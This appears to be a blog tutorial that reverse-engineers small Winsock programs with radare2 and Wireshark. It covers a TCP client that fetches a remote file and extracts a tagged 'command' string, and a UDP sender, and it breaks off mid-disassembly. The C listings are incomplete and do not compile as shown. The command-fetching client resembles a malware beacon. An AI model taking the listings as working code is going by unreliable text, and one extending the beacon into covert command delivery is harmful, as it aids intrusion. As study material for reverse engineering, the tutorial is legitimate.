Buckle up kids cause this post is going to be LONG.
About Winsock
In computing, the Windows Sockets API (WSA), later shortened to Winsock, is a technical specification that defines how Windows network software should access network services, especially TCP/IP. It defines a standard interface between a Windows TCP/IP client application (such as an FTP client or a web browser) and the underlying TCP/IP protocol stack. The nomenclature is based on the Berkeley sockets API model used in BSD for communications between programs.
In this post, we’ll be using radare2 and wireshark (install it by apt-get install wireshark or from its website)
Get requests with winsock
Remember about the get request we did with unix sockets, here’s the equiv. with Winsock
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <conio.h>
#pragma comment(lib, "ws2_32")
#define BUFLEN 65536
#define KSIZE 300
#define BSIZE 256
void getCommand(char buf[], char command[]){
int i = 0;
int kg = 0;
int ki = 0;
while(i < BSIZE && kg == 0){
if(buf[i]== '<' && buf[i+1] == 'm' && buf[i+2] == '>' ){
for(int j=i+3; j < KSIZE+i+2; j++){
command[ki] = buf[j];
ki = ki+1;
kg = 1;
i = i+1;
int main()
char request[] = "GET /sec.txt HTTP/1.1\r\nUser-Agent: nc/0.0.1\r\nHost:\r\nAccept: */*\r\n\r\n";
char buff_rec[BUFLEN];
char command[KSIZE];
SOCKET sock;
SOCKADDR_IN ReceiverAddr , SrcInfo;
int slen = sizeof(ReceiverAddr);
int port = 80;
int bytes_rec=0;
int recv_size=0;
ReceiverAddr.sin_family = AF_INET;
ReceiverAddr.sin_port = htons(port);
ReceiverAddr.sin_addr.s_addr = inet_addr("");
if (connect(sock, (struct sockaddr *) &ReceiverAddr , sizeof(ReceiverAddr)) < 0){
printf("error \n");
return 1;
if( send(sock , &request , strlen(request) , 0) < 0)
printf("send error\n");
return 1;
if((recv_size = recv(sock , buff_rec , BUFLEN , 0)) == SOCKET_ERROR)
printf("recv error\n");
printf("size: %d \n",recv_size);
printf("response: %s \n", buff_rec);
getCommand(buff_rec, command);
printf("command: %s \n", command);
return 0;
[0x004014e0]> s sym.main
[0x0040161e]> pdf
/ (fcn) sym.main 679
| sym.main (int arg_170h, int arg_2a0h, int arg_102a0h, int arg_102a8h, int arg_102b0h, int arg_102b8h, int arg_102c0h, int arg_102c8h, int arg_102d0h, int arg_102d8h, int arg_102e0h, int arg_102e8h, int arg_102ech, int arg_102f8h, int arg_10300h, int arg_10304h, int arg_10308h, int arg_1030ch, int arg_80h);
| ; var int local_40h @ rbp-0x40
| ; arg int arg_80h @ rsp+0x80
| ; CALL XREF from 0x004013c2 (sym.__tmainCRTStartup)
| 0x0040161e 55 push rbp
| 0x0040161f b890030100 mov eax, 0x10390
| 0x00401624 e867170000 call fcn.00402d90
| 0x00401629 4829c4 sub rsp, rax
| 0x0040162c 488dac248000. lea rbp, [arg_80h] ; 0x80 ; 128
| 0x00401634 e887030000 call sym.__main
| 0x00401639 48b847455420. movabs rax, 0x6365732f20544547
| 0x00401643 488985a00201. mov qword [arg_102a0h], rax ; [0x102a0:8]=-1
| 0x0040164a 48b82e747874. movabs rax, 0x545448207478742e
| 0x00401654 488985a80201. mov qword [arg_102a8h], rax ; [0x102a8:8]=-1
| 0x0040165b 48b8502f312e. movabs rax, 0x550a0d312e312f50
| 0x00401665 488985b00201. mov qword [arg_102b0h], rax ; [0x102b0:8]=-1
| 0x0040166c 48b87365722d. movabs rax, 0x6e6567412d726573
| 0x00401676 488985b80201. mov qword [arg_102b8h], rax ; [0x102b8:8]=-1
| 0x0040167d 48b8743a206e. movabs rax, 0x2e302f636e203a74
| 0x00401687 488985c00201. mov qword [arg_102c0h], rax ; [0x102c0:8]=-1
| 0x0040168e 48b8302e310d. movabs rax, 0x736f480a0d312e30
| 0x00401698 488985c80201. mov qword [arg_102c8h], rax ; [0x102c8:8]=-1
| 0x0040169f 48b8743a2031. movabs rax, 0x302e373231203a74
| 0x004016a9 488985d00201. mov qword [arg_102d0h], rax ; [0x102d0:8]=-1
| 0x004016b0 48b82e302e31. movabs rax, 0x63410a0d312e302e
| 0x004016ba 488985d80201. mov qword [arg_102d8h], rax ; [0x102d8:8]=-1
| 0x004016c1 48b863657074. movabs rax, 0x2f2a203a74706563
| 0x004016cb 488985e00201. mov qword [arg_102e0h], rax ; [0x102e0:8]=-1
| 0x004016d2 c785e8020100. mov dword [arg_102e8h], 0xd0a0d2a
| 0x004016dc 66c785ec0201. mov word [arg_102ech], 0xa ; [0x102ec:2]=0xffff
| 0x004016e5 488d85a00200. lea rax, [arg_2a0h] ; 0x2a0 ; 672
| 0x004016ec 41b800000100 mov r8d, 0x10000
| 0x004016f2 ba00000000 mov edx, 0
| 0x004016f7 4889c1 mov rcx, rax
| 0x004016fa e801170000 call sym.memset ; void *memset(void *s, int c, size_t n)
| 0x004016ff c7850c030100. mov dword [arg_1030ch], 0x10 ; 16
| 0x00401709 c78508030100. mov dword [arg_10308h], 0x50 ; 'P' ; 80
| 0x00401713 c78504030100. mov dword [arg_10304h], 0 ; [0x10304:4]=-1
| 0x0040171d c78500030100. mov dword [arg_10300h], 0 ; [0x10300:4]=-1
| 0x00401727 488d45d0 lea rax, [local_30h]
| 0x0040172b 4889c2 mov rdx, rax
| 0x0040172e b902020000 mov ecx, 0x202 ; 514
| 0x00401733 488b05a67c00. mov rax, qword sym.imp.WS2_32.dll_WSAStartup ; [0x4093e0:8]=0x9752 reloc.WS2_32.dll_WSAStartup ; "R\x97"
| 0x0040173a ffd0 call rax
| 0x0040173c 41b806000000 mov r8d, 6
| 0x00401742 ba01000000 mov edx, 1
| 0x00401747 b902000000 mov ecx, 2
| 0x0040174c 488b05bd7c00. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x409410:8]=0x978e reloc.WS2_32.dll_socket
| 0x00401753 ffd0 call rax
| 0x00401755 488985f80201. mov qword [arg_102f8h], rax ; [0x102f8:8]=-1
| 0x0040175c 66c745c00200 mov word [local_40h], 2
| 0x00401762 8b8508030100 mov eax, dword [arg_10308h] ; [0x10308:4]=-1
| 0x00401768 0fb7c0 movzx eax, ax
| 0x0040176b 89c1 mov ecx, eax
| 0x0040176d 488b057c7c00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x4093f0:8]=0x976a reloc.WS2_32.dll_htons ; "j\x97"
| 0x00401774 ffd0 call rax
| 0x00401776 668945c2 mov word [local_3eh], ax
| 0x0040177a 488d0d7f3800. lea rcx, str. ; section..rdata ; 0x405000 ; ""
| 0x00401781 488b05707c00. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x4093f8:8]=0x9772 reloc.WS2_32.dll_inet_addr ; "r\x97"
| 0x00401788 ffd0 call rax
| 0x0040178a 8945c4 mov dword [local_3ch], eax
| 0x0040178d 488d45c0 lea rax, [local_40h]
| 0x00401791 488b8df80201. mov rcx, qword [arg_102f8h] ; [0x102f8:8]=-1
| 0x00401798 41b810000000 mov r8d, 0x10 ; 16
| 0x0040179e 4889c2 mov rdx, rax
| 0x004017a1 488b05407c00. mov rax, qword sym.imp.WS2_32.dll_connect ; [0x4093e8:8]=0x9760 reloc.WS2_32.dll_connect ; "`\x97"
| 0x004017a8 ffd0 call rax
| 0x004017aa 85c0 test eax, eax
| ,=< 0x004017ac 7916 jns 0x4017c4
| | 0x004017ae 488d0d583800. lea rcx, str.error ; 0x40500d ; "error "
| | 0x004017b5 e836160000 call sym.puts ; int puts(const char *s)
| | 0x004017ba b801000000 mov eax, 1
| ,==< 0x004017bf e9f8000000 jmp 0x4018bc
| || ; CODE XREF from 0x004017ac (sym.main)
| |`-> 0x004017c4 488d85a00201. lea rax, [arg_102a0h] ; 0x102a0
| | 0x004017cb 4889c1 mov rcx, rax
| | 0x004017ce e80d160000 call sym.strlen ; size_t strlen(const char *s)
| | 0x004017d3 89c2 mov edx, eax
| | 0x004017d5 488d85a00201. lea rax, [arg_102a0h] ; 0x102a0
| | 0x004017dc 488b8df80201. mov rcx, qword [arg_102f8h] ; [0x102f8:8]=-1
| | 0x004017e3 41b900000000 mov r9d, 0
| | 0x004017e9 4189d0 mov r8d, edx
| | 0x004017ec 4889c2 mov rdx, rax
| | 0x004017ef 488b05127c00. mov rax, qword sym.imp.WS2_32.dll_send ; [0x409408:8]=0x9786 reloc.WS2_32.dll_send
| | 0x004017f6 ffd0 call rax
| | 0x004017f8 85c0 test eax, eax
| |,=< 0x004017fa 7916 jns 0x401812
| || 0x004017fc 488d0d113800. lea rcx, str.send_error ; 0x405014 ; "send error"
| || 0x00401803 e8e8150000 call sym.puts ; int puts(const char *s)
| || 0x00401808 b801000000 mov eax, 1
| ,===< 0x0040180d e9aa000000 jmp 0x4018bc
| ||| ; CODE XREF from 0x004017fa (sym.main)
| ||`-> 0x00401812 488d85a00200. lea rax, [arg_2a0h] ; 0x2a0 ; 672
| || 0x00401819 488b8df80201. mov rcx, qword [arg_102f8h] ; [0x102f8:8]=-1
| || 0x00401820 41b900000000 mov r9d, 0
| || 0x00401826 41b800000100 mov r8d, 0x10000
| || 0x0040182c 4889c2 mov rdx, rax
| || 0x0040182f 488b05ca7b00. mov rax, qword sym.imp.WS2_32.dll_recv ; [0x409400:8]=0x977e reloc.WS2_32.dll_recv ; "~\x97"
| || 0x00401836 ffd0 call rax
| || 0x00401838 898500030100 mov dword [arg_10300h], eax ; [0x10300:4]=-1
| || 0x0040183e 83bd00030100. cmp dword [arg_10300h], 0xffffffffffffffff
| ||,=< 0x00401845 750e jne 0x401855
| ||| 0x00401847 488d0dd13700. lea rcx, str.recv_error ; 0x40501f ; "recv error"
| ||| 0x0040184e e89d150000 call sym.puts ; int puts(const char *s)
| ,====< 0x00401853 eb62 jmp 0x4018b7
| |||| ; CODE XREF from 0x00401845 (sym.main)
| |||`-> 0x00401855 8b8500030100 mov eax, dword [arg_10300h] ; [0x10300:4]=-1
| ||| 0x0040185b 89c2 mov edx, eax
| ||| 0x0040185d 488d0dc63700. lea rcx, str.size:__d ; 0x40502a ; "size: %d \n"
| ||| 0x00401864 e88f150000 call sym.printf ; int printf(const char *format)
| ||| 0x00401869 488d85a00200. lea rax, [arg_2a0h] ; 0x2a0 ; 672
| ||| 0x00401870 4889c2 mov rdx, rax
| ||| 0x00401873 488d0dbb3700. lea rcx, str.response:__s ; 0x405035 ; "response: %s \n"
| ||| 0x0040187a e879150000 call sym.printf ; int printf(const char *format)
| ||| 0x0040187f 488d0dbe3700. lea rcx, str. ; 0x405044 ; "-----------------"
| ||| 0x00401886 e865150000 call sym.puts ; int puts(const char *s)
| ||| 0x0040188b 488d95700100. lea rdx, [arg_170h] ; 0x170 ; 368
| ||| 0x00401892 488d85a00200. lea rax, [arg_2a0h] ; 0x2a0 ; 672
| ||| 0x00401899 4889c1 mov rcx, rax
| ||| 0x0040189c e8affcffff call sym.getCommand
| ||| 0x004018a1 488d85700100. lea rax, [arg_170h] ; 0x170 ; 368
| ||| 0x004018a8 4889c2 mov rdx, rax
| ||| 0x004018ab 488d0da43700. lea rcx, str.command:__s ; 0x405056 ; "command: %s \n"
| ||| 0x004018b2 e841150000 call sym.printf ; int printf(const char *format)
| ||| ; CODE XREF from 0x00401853 (sym.main)
| `----> 0x004018b7 b800000000 mov eax, 0
| || ; CODE XREF from 0x004017bf (sym.main)
| || ; CODE XREF from 0x0040180d (sym.main)
| ``--> 0x004018bc 4881c4900301. add rsp, 0x10390
| 0x004018c3 5d pop rbp
\ 0x004018c4 c3 ret
So at first the program seems to be initializing some memory, like an array or something:
| 0x004016e5 488d85a00200. lea rax, [arg_2a0h] ; 0x2a0 ; 672
| 0x004016ec 41b800000100 mov r8d, 0x10000
;-- rip:
| 0x004016f2 b ba00000000 mov edx, 0
| 0x004016f7 4889c1 mov rcx, rax
And that is what it is as we see here:
[0x004016f2]> afvd
arg arg_102a0h = 0x0061fdb0 0x6365732f20544547 GET /sec ascii
arg arg_102a8h = 0x0061fdb8 0x545448207478742e .txt HTT ascii
[0x004016f2]> pxw @ 0x0061fdb0
0x0061fdb0 0x20544547 0x6365732f 0x7478742e 0x54544820 GET /sec.txt HTT
0x0061fdc0 0x2e312f50 0x550a0d31 0x2d726573 0x6e656741 P/1.1..User-Agen
0x0061fdd0 0x6e203a74 0x2e302f63 0x0d312e30 0x736f480a t: nc/0.0.1..Hos
0x0061fde0 0x31203a74 0x302e3732 0x312e302e 0x63410a0d t:
0x0061fdf0 0x74706563 0x2f2a203a 0x0d0a0d2a 0x0000000a cept: */*.......
It basically initializes a char array containing the HTTP (GET) REQUEST to be done
This is useful, as now we basically know or at least can easily figure out what the program does. We also see /sec.txt here which is the path, so we can easily go there on the server ourselves and try to see what that file represents
Then memset and WSAStartup are called:
| 0x004016f7 4889c1 mov rcx, rax
| 0x004016fa e801170000 call sym.memset ; void *memset(void *s, int c, size_t n)
| 0x004016ff c7850c030100. mov dword [arg_1030ch], 0x10 ; r12
| 0x00401709 c78508030100. mov dword [arg_10308h], 0x50 ; 'P' ; 80
| 0x00401713 c78504030100. mov dword [arg_10304h], 0 ; [0x10304:4]=0
| 0x0040171d c78500030100. mov dword [arg_10300h], 0 ; [0x10300:4]=0
| 0x00401727 488d45d0 lea rax, [local_30h]
| 0x0040172b 4889c2 mov rdx, rax
| 0x0040172e b902020000 mov ecx, 0x202 ; 514
| 0x00401733 488b05a67c00. mov rax, qword sym.imp.WS2_32.dll_WSAStartup ; [0x4093e0:8]=0x7ffcc178da50 ; "P\xdax\xc1\xfc\x7f"
| 0x0040173a ffd0 call rax
So, memset here as we see is zeroing a buffer, that will probably be used for sending/receiving stuff (the get request) to-from the server.
Then WSAStartup basically sets the environment up for WINSOCK to be used, we cannot create a Socket without previously calling WSAStartup.
Then the socket is created:
| 0x0040173c 41b806000000 mov r8d, 6
| 0x00401742 ba01000000 mov edx, 1
| 0x00401747 b902000000 mov ecx, 2
| 0x0040174c 488b05bd7c00. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x409410:8]=0x7ffcc1786230 ; "0bx\xc1\xfc\x7f"
| 0x00401753 ffd0 call rax
Params are 6,1,2 and from what we already know we should see those mean that our socket will be a tcp inet socket and thus the connection will be in “stream” mode.
Then another interesting call appears: htons
| 0x0040176b 89c1 mov ecx, eax
;-- rip:
| 0x0040176d b 488b057c7c00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x4093f0:8]=0x7ffcc1793aa0
| 0x00401774 ffd0 call rax
[0x0040176d]> dr ecx
From this one, we should be able to detect that the remote port is 80,(0x50 = 80dec), so now we know about the port and the get request, what remains is the server address
And tbh that is mega easy, cause in here we find it hardcoded:
| 0x0040177a 488d0d7f3800. lea rcx, str. ; section..rdata ; 0x405000 ; ""
| 0x00401781 488b05707c00. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x4093f8:8]=0x7ffcc1794190
| 0x00401788 ffd0 call rax
inet_addr() call gets the network byte order address from a char array. Now we know anything about the program, as we see connect is then called with those params and send as well.
| | 0x004017d5 488d85a00201. lea rax, [arg_102a0h] ; 0x102a0
| | 0x004017dc 488b8df80201. mov rcx, qword [arg_102f8h] ; [0x102f8:8]=0x100000001
| | 0x004017e3 41b900000000 mov r9d, 0
| | 0x004017e9 4189d0 mov r8d, edx
| | 0x004017ec 4889c2 mov rdx, rax
| | 0x004017ef 488b05127c00. mov rax, qword sym.imp.WS2_32.dll_send ; [0x409408:8]=0x7ffcc1791210
| | 0x004017f6 ffd0 call rax
And as we see the GET request we saw is what gets sent
Next thing here is, what about the response? What do we get from the server? Let’s inspect RECV
| ||`-> 0x00401812 488d85a00200. lea rax, [arg_2a0h] ; 0x2a0 ; 672
| || 0x00401819 488b8df80201. mov rcx, qword [arg_102f8h] ; [0x102f8:8]=0x100000001
| || 0x00401820 41b900000000 mov r9d, 0
| || 0x00401826 41b800000100 mov r8d, 0x10000
| || 0x0040182c 4889c2 mov rdx, rax
| || 0x0040182f 488b05ca7b00. mov rax, qword sym.imp.WS2_32.dll_recv ; [0x409400:8]=0x7ffcc17917b0
| || 0x00401836 ffd0 call rax
And if we debug that we’ll see it:
[0x0040182f]> pxw @ 0x0060fdb0
0x0060fdb0 0x50545448 0x312e312f 0x30303220 0x0d4b4f20 HTTP/1.1 200 OK.
0x0060fdc0 0x7461440a 0x54203a65 0x202c7568 0x4a203131 .Date: Thu, 11 J
0x0060fdd0 0x32206e75 0x20303230 0x313a3031 0x34353a30 un 2020 10:10:54
0x0060fde0 0x544d4720 0x65530a0d 0x72657672 0x7041203a GMT..Server: Ap
0x0060fdf0 0x65686361 0x342e322f 0x2038312e 0x75625528 ache/2.4.18 (Ubu
0x0060fe00 0x2975746e 0x614c0a0d 0x4d2d7473 0x6669646f ntu)..Last-Modif
0x0060fe10 0x3a646569 0x64655720 0x3031202c 0x6e754a20 ied: Wed, 10 Jun
0x0060fe20 0x32303220 0x31312030 0x3a36313a 0x47203232 2020 11:16:22 G
0x0060fe30 0x0a0d544d 0x67615445 0x3122203a 0x61352d62 MT..ETag: "1b-5a
0x0060fe40 0x66386237 0x65333539 0x22306134 0x63410a0d 7b8f953e4a0"..Ac
0x0060fe50 0x74706563 0x6e61522d 0x3a736567 0x74796220 cept-Ranges: byt
0x0060fe60 0x0a0d7365 0x746e6f43 0x2d746e65 0x676e654c es..Content-Leng
0x0060fe70 0x203a6874 0x0a0d3732 0x746e6f43 0x2d746e65 th: 27..Content-
0x0060fe80 0x65707954 0x6574203a 0x702f7478 0x6e69616c Type: text/plain
0x0060fe90 0x0a0d0a0d 0x6d3e6d3c 0x61737365 0x74206567 ....<m>message t
0x0060fea0 0x6562206f 0x6c656420 0x72657669 0x000a6465 o be delivered..
That’s it.
If we have an open wireshark session on the server box we should see something like this:
00000000 47 45 54 20 2f 73 65 63 2e 74 78 74 20 48 54 54 GET /sec .txt HTT
00000010 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41 67 65 6e P/1.1..U ser-Agen
00000020 74 3a 20 6e 63 2f 30 2e 30 2e 31 0d 0a 48 6f 73 t: nc/0. 0.1..Hos
00000030 74 3a 20 31 32 37 2e 30 2e 30 2e 31 0d 0a 41 63 t: 127.0 .0.1..Ac
00000040 63 65 70 74 3a 20 2a 2f 2a 0d 0a 0d 0a cept: */ *....
00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
00000010 0a 44 61 74 65 3a 20 54 68 75 2c 20 31 31 20 4a .Date: T hu, 11 J
00000020 75 6e 20 32 30 32 30 20 31 30 3a 31 30 3a 35 34 un 2020 10:10:54
00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 GMT..Se rver: Ap
00000040 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 ache/2.4 .18 (Ubu
00000050 6e 74 75 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 ntu)..La st-Modif
00000060 69 65 64 3a 20 57 65 64 2c 20 31 30 20 4a 75 6e ied: Wed , 10 Jun
00000070 20 32 30 32 30 20 31 31 3a 31 36 3a 32 32 20 47 2020 11 :16:22 G
00000080 4d 54 0d 0a 45 54 61 67 3a 20 22 31 62 2d 35 61 MT..ETag : "1b-5a
00000090 37 62 38 66 39 35 33 65 34 61 30 22 0d 0a 41 63 7b8f953e 4a0"..Ac
000000A0 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 cept-Ran ges: byt
000000B0 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 es..Cont ent-Leng
000000C0 74 68 3a 20 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d th: 27.. Content-
000000D0 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e Type: te xt/plain
000000E0 0d 0a 0d 0a ....
000000E4 3c 6d 3e 6d 65 73 73 61 67 65 20 74 6f 20 62 65 <m>messa ge to be
000000F4 20 64 65 6c 69 76 65 72 65 64 0a deliver ed.
Next thing to know here is if the program does something with this response, and we see the getCommand func being called:
| ||| 0x00401886 e865150000 call sym.puts ; int puts(const char *s)
| ||| 0x0040188b 488d95700100. lea rdx, [arg_170h] ; 0x170 ; 368
| ||| 0x00401892 488d85a00200. lea rax, [arg_2a0h] ; 0x2a0 ; 672
| ||| 0x00401899 4889c1 mov rcx, rax
| ||| 0x0040189c e8affcffff call sym.getCommand
| ,=< 0x00401575 e98a000000 jmp 0x401604
| | ; CODE XREF from 0x00401611 (sym.getCommand)
| .--> 0x0040157a 8b45fc mov eax, dword [local_4h]
| :| 0x0040157d 4898 cdqe
| :| 0x0040157f 488b5510 mov rdx, qword [arg_10h] ; r12 ; [0x10:8]=-1
| :| 0x00401583 4801d0 add rax, rdx ; '('
| :| 0x00401586 0fb600 movzx eax, byte [rax]
| :| 0x00401589 3c3c cmp al, 0x3c ; '<' ; 60
| ,===< 0x0040158b 7573 jne 0x401600
| |:| 0x0040158d 8b45fc mov eax, dword [local_4h]
| |:| 0x00401590 4898 cdqe
| |:| 0x00401592 488d5001 lea rdx, [rax + 1] ; 1
| |:| 0x00401596 488b4510 mov rax, qword [arg_10h] ; r12 ; [0x10:8]=-1
| |:| 0x0040159a 4801d0 add rax, rdx ; '('
| |:| 0x0040159d 0fb600 movzx eax, byte [rax]
| |:| 0x004015a0 3c6d cmp al, 0x6d ; 'm' ; 109
| ,====< 0x004015a2 755c jne 0x401600
| ||:| 0x004015a4 8b45fc mov eax, dword [local_4h]
| ||:| 0x004015a7 4898 cdqe
| ||:| 0x004015a9 488d5002 lea rdx, [rax + 2] ; rcx
| ||:| 0x004015ad 488b4510 mov rax, qword [arg_10h] ; r12 ; [0x10:8]=-1
| ||:| 0x004015b1 4801d0 add rax, rdx ; '('
| ||:| 0x004015b4 0fb600 movzx eax, byte [rax]
| ||:| 0x004015b7 3c3e cmp al, 0x3e ; '>' ; 62
| ,=====< 0x004015b9 7545 jne 0x401600
| |||:| 0x004015bb 8b45fc mov eax, dword [local_4h]
| |||:| 0x004015be 83c003 add eax, 3
| |||:| 0x004015c1 8945f0 mov dword [local_10h], eax
| ,======< 0x004015c4 eb26 jmp 0x4015ec
| ||||:| ; CODE XREF from 0x004015f7 (sym.getCommand)
| .-------> 0x004015c6 8b45f0 mov eax, dword [local_10h]
| :||||:| 0x004015c9 4898 cdqe
| :||||:| 0x004015cb 488b5510 mov rdx, qword [arg_10h] ; r12 ; [0x10:8]=-1
| :||||:| 0x004015cf 4801d0 add rax, rdx ; '('
| :||||:| 0x004015d2 8b55f4 mov edx, dword [local_ch]
| :||||:| 0x004015d5 4863d2 movsxd rdx, edx
| :||||:| 0x004015d8 488b4d18 mov rcx, qword [arg_18h] ; [0x18:8]=-1 ; 24
| :||||:| 0x004015dc 4801ca add rdx, rcx ; '&'
| :||||:| 0x004015df 0fb600 movzx eax, byte [rax]
| :||||:| 0x004015e2 8802 mov byte [rdx], al
| :||||:| 0x004015e4 8345f401 add dword [local_ch], 1
| :||||:| 0x004015e8 8345f001 add dword [local_10h], 1
| :||||:| ; CODE XREF from 0x004015c4 (sym.getCommand)
| :`------> 0x004015ec 8b45fc mov eax, dword [local_4h]
| : |||:| 0x004015ef 052d010000 add eax, 0x12d
| : |||:| 0x004015f4 3945f0 cmp dword [local_10h], eax ; [0x13:4]=-1 ; 19
| `=======< 0x004015f7 7ecd jle 0x4015c6
| |||:| 0x004015f9 c745f8010000. mov dword [local_8h], 1
| |||:| ; CODE XREF from 0x0040158b (sym.getCommand)
| |||:| ; CODE XREF from 0x004015a2 (sym.getCommand)
| |||:| ; CODE XREF from 0x004015b9 (sym.getCommand)
| ```---> 0x00401600 8345fc01 add dword [local_4h], 1
| :| ; CODE XREF from 0x00401575 (sym.getCommand)
| :`-> 0x00401604 817dfcff0000. cmp dword [local_4h], 0xff ; rax ; [0xff:4]=-1
| :,=< 0x0040160b 7f0a jg 0x401617
| :| 0x0040160d 837df800 cmp dword [local_8h], 0
| `==< 0x00401611 0f8463ffffff je 0x40157a
| | ; CODE XREF from 0x0040160b (sym.getCommand)
| `-> 0x00401617 90 nop
And again, we are already familiar with this function, it just parses the message in a rudimentary way. As it looks liek the program is not doing anything with that we can consider that our work with this one is done.
Hello world UDP
Until now we have only seen TCP sockets being used, UDP can be used as well in both Linux using sock and here in the Windows lands using Winsock. The main difference between TCP and UDP is that UDP will just send the data out without any kind of syncronization or integrity check, so the data may arrive at dest or not, it is commonly used in video streaming but also in other cool stuff like DNS.
One interesting thing regarding UDP packets is that as far as I’ve seen they don’t call the interest of security researchers / blue teams as much as TCP and some take advantage of this, we’ll see.
So the following program is a classical example of a UDP packet being sent using Winsock. We can use netcat to receive it:
We’ll start a netcat listener expecting UDP packets at port 5353 with this:
nc -lvup 5353
Anything received there will be printed
The code for the “client” is the following:
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <conio.h>
#pragma comment(lib, "ws2_32")
#define BUFLEN 65536
int main()
char buffer[] = {'h','e','l','l','o'};
SOCKET sock;
SOCKADDR_IN ReceiverAddr , SrcInfo;
int slen = sizeof(ReceiverAddr);
int port = 5353;
int bytes_rec=0;
ReceiverAddr.sin_family = AF_INET;
ReceiverAddr.sin_port = htons(port);
ReceiverAddr.sin_addr.s_addr = inet_addr("");
int r =sendto(sock, &buffer , sizeof(buffer) , 0, (struct SOCKADDR *) &ReceiverAddr, slen);
printf("bytes sent: %d \n", r);
bytes_rec=recvfrom(sock, &buffer, sizeof(buffer), 0,0,0);
printf("bytes rec: %d \n", bytes_rec);
printf("response: %s", buffer);
return 0;
Just note that the buffer we are sending can be declared they (weird) way I did or we can also use char *buffer = “hello”.
Also note that in here with UDP we use dgram (datagram) and we indicate udp as the protocol and we are not doing connect() here, we are just doing sendto. You should know why, as we don’t have “sessions” in UDP, we just send the data out, expecting no confirmation.
When doing recv() we’ll expect data from the server in return that may or may not come.
Let’s look at the disasm:
[0x00401550]> pdf
/ (fcn) sym.main 415
| sym.main (int arg_17fh, int arg_180h, int arg_181h, int arg_182h, int arg_183h, int arg_184h, int arg_188h, int arg_194h, int arg_198h, int arg_19ch);
| ; CALL XREF from 0x004013c2 (sym.__tmainCRTStartup)
| 0x00401550 55 push rbp
| 0x00401551 4881ec200200. sub rsp, 0x220
| 0x00401558 488dac248000. lea rbp, [local_80h] ; 0x80 ; 128
| 0x00401560 e86b020000 call sym.__main
| 0x00401565 c6857f010000. mov byte [arg_17fh], 0x68 ; 'h' ; 104
| 0x0040156c c68580010000. mov byte [arg_180h], 0x65 ; 'e' ; 101
| 0x00401573 c68581010000. mov byte [arg_181h], 0x6c ; 'l' ; 108
| 0x0040157a c68582010000. mov byte [arg_182h], 0x6c ; 'l' ; 108
| 0x00401581 c68583010000. mov byte [arg_183h], 0x6f ; 'o' ; 111
| 0x00401588 c7859c010000. mov dword [arg_19ch], 0x10 ; 16
| 0x00401592 c78598010000. mov dword [arg_198h], 0x14e9
| 0x0040159c c78594010000. mov dword [arg_194h], 0 ; [0x194:4]=-1 ; 0
| 0x004015a6 488d45e0 lea rax, [local_20h]
| 0x004015aa 4889c2 mov rdx, rax
| 0x004015ad b902020000 mov ecx, 0x202 ; 514
| 0x004015b2 488b050f6e00. mov rax, qword sym.imp.WS2_32.dll_WSAStartup ; [0x4083c8:8]=0x872a reloc.WS2_32.dll_WSAStartup ; "*\x87"
| 0x004015b9 ffd0 call rax
| 0x004015bb 41b811000000 mov r8d, 0x11 ; 17
| 0x004015c1 ba02000000 mov edx, 2
| 0x004015c6 b902000000 mov ecx, 2
| 0x004015cb 488b051e6e00. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x4083f0:8]=0x8762 reloc.WS2_32.dll_socket ; "b\x87"
| 0x004015d2 ffd0 call rax
| 0x004015d4 488985880100. mov qword [arg_188h], rax ; [0x188:8]=-1 ; 392
| 0x004015db 66c745d00200 mov word [local_30h], 2
| 0x004015e1 8b8598010000 mov eax, dword [arg_198h] ; [0x198:4]=-1 ; 408
| 0x004015e7 0fb7c0 movzx eax, ax
| 0x004015ea 89c1 mov ecx, eax
| 0x004015ec 488b05dd6d00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x4083d0:8]=0x8738 reloc.WS2_32.dll_htons ; "8\x87"
| 0x004015f3 ffd0 call rax
| 0x004015f5 668945d2 mov word [local_2eh], ax
| 0x004015f9 488d0d002a00. lea rcx, str. ; section..rdata ; 0x404000 ; ""
| 0x00401600 488b05d16d00. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x4083d8:8]=0x8740 reloc.WS2_32.dll_inet_addr ; "@\x87"
| 0x00401607 ffd0 call rax
| 0x00401609 8945d4 mov dword [local_2ch], eax
| 0x0040160c 488d857f0100. lea rax, [arg_17fh] ; 0x17f ; 383
| 0x00401613 488b8d880100. mov rcx, qword [arg_188h] ; [0x188:8]=-1 ; 392
| 0x0040161a 8b959c010000 mov edx, dword [arg_19ch] ; [0x19c:4]=-1 ; 412
| 0x00401620 89542428 mov dword [local_28h], edx
| 0x00401624 488d55d0 lea rdx, [local_30h]
| 0x00401628 4889542420 mov qword [local_20h_2], rdx
| 0x0040162d 41b900000000 mov r9d, 0
| 0x00401633 41b805000000 mov r8d, 5
| 0x00401639 4889c2 mov rdx, rax
| 0x0040163c 488b05a56d00. mov rax, qword sym.imp.WS2_32.dll_sendto ; [0x4083e8:8]=0x8758 reloc.WS2_32.dll_sendto ; "X\x87"
| 0x00401643 ffd0 call rax
| 0x00401645 898584010000 mov dword [arg_184h], eax ; [0x184:4]=-1 ; 388
| 0x0040164b 8b8584010000 mov eax, dword [arg_184h] ; [0x184:4]=-1 ; 388
| 0x00401651 89c2 mov edx, eax
| 0x00401653 488d0db32900. lea rcx, str.bytes_sent:__d ; 0x40400d ; "bytes sent: %d \n"
| 0x0040165a e8a1150000 call sym.printf ; int printf(const char *format)
| 0x0040165f 488d857f0100. lea rax, [arg_17fh] ; 0x17f ; 383
